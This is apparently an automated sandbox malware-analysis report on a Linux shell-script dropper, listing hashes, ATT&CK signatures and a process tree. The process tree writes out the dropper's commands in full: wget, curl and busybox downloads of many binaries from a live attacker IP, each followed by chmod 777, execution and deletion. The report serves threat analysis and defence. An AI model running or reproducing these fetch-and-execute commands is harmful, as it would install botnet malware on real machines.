Analysis
-
max time kernel
24s -
max time network
26s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/10/2024, 02:45
Static task
static1
Behavioral task
behavioral1
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
-
Size
10KB
-
MD5
213cb7829c8f2673d0e3a75ed6639e13
-
SHA1
3daec954fef9c3751e7ce17a5d90672ccaf98608
-
SHA256
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17
-
SHA512
b8be68bfce37af24db9820d6960f1a66a43e4822dff463d9d5a485644d38ba72c7556113c1f4884d0c87fbf4bf318833208844059dcbb8b998dc6cf8e29554c4
-
SSDEEP
192:UouKo0b2Oyw0Iz0sbES+ssW5dw/3vUfDp5dw/3jrS+sFfDzPo0b2Ov0Iz0sl:UoGw0Iz0sbES+ssW5dw/3m5dw/3nS+s/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 843 chmod 873 chmod 719 chmod 779 chmod 793 chmod 805 chmod 817 chmod 837 chmod 696 chmod 757 chmod 799 chmod 745 chmod 823 chmod 867 chmod 682 chmod 811 chmod 829 chmod 849 chmod 855 chmod 861 chmod -
Executes dropped EXE 20 IoCs
ioc pid Process /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB 683 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM 697 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne 721 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI 746 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy 759 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H 780 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 794 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn 800 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 806 MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 812 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 818 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj 824 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 830 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 838 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj 844 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 850 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 856 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 862 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 868 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne 874 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne -
Checks CPU configuration 1 TTPs 20 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 827 curl 846 wget 847 curl 826 wget 828 busybox 830 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 831 rm 848 busybox 850 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 851 rm -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 curl File opened for modification /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 curl File opened for modification /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 curl File opened for modification /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn curl File opened for modification /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj curl File opened for modification /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn curl File opened for modification /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 curl File opened for modification /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM curl File opened for modification /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne curl File opened for modification /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI curl File opened for modification /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn curl File opened for modification /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 curl File opened for modification /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB curl File opened for modification /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy curl File opened for modification /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H curl File opened for modification /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj curl File opened for modification /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne curl File opened for modification /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 curl File opened for modification /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 curl File opened for modification /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 curl
Processes
-
/tmp/7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh/tmp/7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh1⤵PID:649
-
/bin/rm/bin/rm bins.sh2⤵PID:652
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:672
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:680
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:683
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:684
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:685
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:686
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:690
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:697
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:698
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:699
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:707
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:714
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:719
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:721
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:723
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:743
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:752
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:760
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:762
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:774
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:782
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:783
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:792
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:798
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:804
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:810
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:816
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:822
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:830
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:831
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:836
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:840
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:842
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:846
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:848
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:850
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:851
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:854
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:860
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:866
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:872
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:876
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97